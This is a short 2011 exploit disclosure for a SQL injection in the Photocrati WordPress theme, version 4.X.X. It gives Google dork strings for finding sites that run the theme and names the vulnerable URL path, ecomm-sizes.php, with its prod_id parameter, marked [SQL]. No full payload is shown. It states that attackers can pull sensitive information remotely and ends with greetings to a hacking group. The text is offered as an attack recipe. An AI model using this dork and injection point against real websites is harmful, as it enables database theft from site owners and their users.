# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]# Date: [23 / 09 / 2011 ]# Exploit Author: [ ayastar ]# Email : dmx-ayastar@hotmail.fr# Software Link: [ http://www.photocrati.com ]# Version: [4.X.X]# Tested on: [ windows 7 ]--------
details |=======================================================
Software : photocrati
version :4.X.X
Risk : High
remote : yes
attacker can do a remote injection in site URL to get some sensitive information .
almost all version are infected by this vunl.=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
greetz to all muslims andall tryag member's
:)from morocco
